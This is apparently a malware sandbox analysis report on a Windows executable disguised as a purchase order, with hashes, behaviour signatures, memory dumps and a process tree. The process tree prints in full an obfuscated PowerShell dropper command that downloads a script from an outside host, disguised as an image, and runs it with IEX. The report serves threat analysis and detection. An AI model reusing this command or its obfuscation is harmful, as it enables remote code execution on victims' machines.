Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-12-2024 21:57

General

  • Target

    New order 003848848575 02162022.exe

  • Size

    6KB

  • MD5

    ec11df1acf1ce25da6daad0453d92f02

  • SHA1

    a3eb5d8f63e6f6cc15445002d8deb7be47fd013a

  • SHA256

    b8043f0e196bc7742dfe211a10481ddf844442a3c135de465494bdd619546ce3

  • SHA512

    5271f51a9b89e5748e32dfdc1b302d968ecd0085d82cb1a0c1e9b867244599687051f1770798789db4e4fc9591953d4d734f3ab0a2b641fcb989880932ab779c

  • SSDEEP

    96:WRkWOfaeOVMwsO4JdjC/oI0HIGrqW0zNt:dDBlJJDISIib+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://spa2o.com/H99.jpg

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe
    "C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Hide Artifacts: Ignore Process Interrupts
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2292

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1044-0-0x000007FEF5233000-0x000007FEF5234000-memory.dmp

    Filesize

    4KB

  • memory/1044-1-0x0000000000FE0000-0x0000000000FE8000-memory.dmp

    Filesize

    32KB

  • memory/2292-6-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

    Filesize

    4KB

  • memory/2292-7-0x000000001B600000-0x000000001B8E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2292-8-0x0000000001F50000-0x0000000001F58000-memory.dmp

    Filesize

    32KB

  • memory/2292-9-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2292-10-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2292-12-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2292-11-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2292-13-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2292-14-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB